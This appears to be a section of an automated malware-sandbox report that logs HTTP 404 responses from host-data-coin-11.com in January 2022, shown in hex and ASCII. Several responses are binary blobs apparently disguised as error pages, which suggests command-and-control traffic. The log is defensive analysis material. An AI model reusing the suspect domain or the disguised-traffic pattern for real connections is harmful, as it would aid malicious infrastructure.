                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:47 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:48 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:48 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:50 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:50 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:52 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:53 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 12:59:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 13:00:04 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close
